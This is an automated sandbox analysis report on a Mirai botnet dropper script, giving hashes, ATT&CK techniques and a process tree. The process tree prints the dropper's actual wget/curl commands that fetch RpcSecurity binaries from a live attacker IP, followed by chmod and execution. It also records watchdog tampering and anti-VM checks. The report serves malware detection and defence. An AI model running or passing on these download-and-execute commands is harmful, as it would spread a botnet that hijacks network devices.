mirai | ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a

Analysis

max time kernel
147s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
27-12-2024 06:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GuruITDDoS3.sh
Size

2KB
MD5

c01f89f66afa819108643774b814bfaf
SHA1

abde31c7a7b764f70527ef07b3f57a9993b949b8
SHA256

ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a
SHA512

a5e94401ba1d9e605e4c65143c57eb3235ee0a6a63f71e55a129e57cf6252c33f51aa2ee46271796d7b21f28eb1cbbbd6fa0d380de376714dcc17e05ebd06f80

Score

10^/10

mirai demons antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Extracted

Family

mirai

Botnet

DEMONS

Extracted

Family

mirai

Botnet

DEMONS

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
771	chmod
669	chmod
686	chmod
706	chmod
731	chmod

Executes dropped EXE 5 IoCs

ioc	pid	Process
/tmp/RpcSecurity	670	RpcSecurity
/tmp/RpcSecurity	688	RpcSecurity
/tmp/RpcSecurity	708	RpcSecurity
/tmp/RpcSecurity	733	RpcSecurity
/tmp/RpcSecurity	772	RpcSecurity

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	RpcSecurity
File opened for modification	/dev/misc/watchdog	RpcSecurity

Enumerates active TCP sockets 1 TTPs 2 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	RpcSecurity
File opened for reading	/proc/net/tcp	RpcSecurity

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	RpcSecurity

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	}i}pcG[XKK]**`	733	RpcSecurity

Checks CPU configuration 1 TTPs 5 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	RpcSecurity
File opened for reading	/proc/net/tcp	RpcSecurity

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
673	wget
677	curl
684	cat

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/RpcSecurity.x86	wget
File opened for modification	/tmp/RpcSecurity.mpsl	wget
File opened for modification	/tmp/RpcSecurity.mpsl	curl
File opened for modification	/tmp/RpcSecurity.arm	wget
File opened for modification	/tmp/RpcSecurity.arm	curl
File opened for modification	/tmp/RpcSecurity.x86	curl
File opened for modification	/tmp/RpcSecurity	GuruITDDoS3.sh
File opened for modification	/tmp/RpcSecurity.mips	wget
File opened for modification	/tmp/RpcSecurity.mips	curl
File opened for modification	/tmp/RpcSecurity.arm5	wget
File opened for modification	/tmp/RpcSecurity.arm5	curl

/tmp/GuruITDDoS3.sh
/tmp/GuruITDDoS3.sh
1⤵
- Writes file to tmp directory
PID:638
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.x86
  2⤵
  - Writes file to tmp directory
  PID:640
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:658
- /bin/cat
  cat RpcSecurity.x86
  2⤵
  PID:667
- /bin/chmod
  chmod +x GuruITDDoS3.sh RpcSecurity RpcSecurity.x86 systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-GTlaeN
  2⤵
  - File and Directory Permissions Modification
  PID:669
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  PID:670
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:673
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:677
- /bin/cat
  cat RpcSecurity.mips
  2⤵
  - System Network Configuration Discovery
  PID:684
- /bin/chmod
  chmod +x GuruITDDoS3.sh RpcSecurity RpcSecurity.mips RpcSecurity.x86 systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-GTlaeN
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  PID:688
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.mpsl
  2⤵
  - Writes file to tmp directory
  PID:690
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/cat
  cat RpcSecurity.mpsl
  2⤵
  PID:705
- /bin/chmod
  chmod +x GuruITDDoS3.sh RpcSecurity RpcSecurity.mips RpcSecurity.mpsl RpcSecurity.x86 systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-GTlaeN
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  PID:708
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.arm
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:719
- /bin/cat
  cat RpcSecurity.arm
  2⤵
  PID:729
- /bin/chmod
  chmod +x GuruITDDoS3.sh RpcSecurity RpcSecurity.arm RpcSecurity.mips RpcSecurity.mpsl RpcSecurity.x86 systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-GTlaeN
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:733
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.arm5
  2⤵
  - Writes file to tmp directory
  PID:767
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:769
- /bin/chmod
  chmod +x GuruITDDoS3.sh RpcSecurity RpcSecurity.arm RpcSecurity.arm5 RpcSecurity.mips RpcSecurity.mpsl RpcSecurity.x86 systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-GTlaeN
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RpcSecurity

Filesize
75KB

MD5
b42000c87e42345dffd95c15b6ac2428

SHA1
52e9fa49ce26d85ad5dfbabe98d8ed178705c542

SHA256
324cf363149eb9264bac519d0cdb8fd93e3f211cd2e5cd3f9d784be8c1cb2ee0

SHA512
c239f7931b97709b363be637d3f60b7c3c60b181d86ed636b2d7d3d51e49761009c76bde64ef81ca95fc5a3da1ba48e83450970a0f2e6720634a5cbb40e6babf

Download Submit
/tmp/RpcSecurity

Filesize
75KB

MD5
909e68d7f9baf5b2c79023ca027aa132

SHA1
1a17caa726700e04242251f101298bf209c54c18

SHA256
8ad68a6dd76f0ca58d1651343916807370fabc294394c12cb4209d5cdb7dc259

SHA512
31c1925c839304e1336d1b09a0e30734ff6bb2d476ae6174eebfebce5664ff8944e2acd986b57b2e0045ba6a1f760d7003cb3920fdf3746789df321423f7579e

Download Submit
/tmp/RpcSecurity

Filesize
59KB

MD5
7f662812ede5182b5c29a0fbc2ea1194

SHA1
3039b2fec557819f487e25914342ea71c40f8f82

SHA256
efc7165c2ae8f899dac4591c910166d8e9b11af6393947ea06ed365432389ece

SHA512
aa416ae5fe611567691c16f74db98a4a0afbba84c4c391ca346c55661fdc13ca68323b9be3c694cc7365e0d0be3bcf6422208dfa47be3c1172ec1b84b740b722

Download Submit
/tmp/RpcSecurity.x86

Filesize
54KB

MD5
7e83ac9f8b9ae088c5336df0d874926f

SHA1
a5fe7d25942a9f04f8a4cfb57d5781d7042a48d5

SHA256
1b8b5cc9cb64473380cd6898f7580339f38a3cd6e7f90d1768c7842e998bb3ed

SHA512
0e4dda062bb583dad01c1a9ab9018303003dce5078c30af63b222fa82b93f4fc19bc0bdd6e8f4c3024b0d9502470bbf26238ea991f08ded59e040b89f3156d2b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads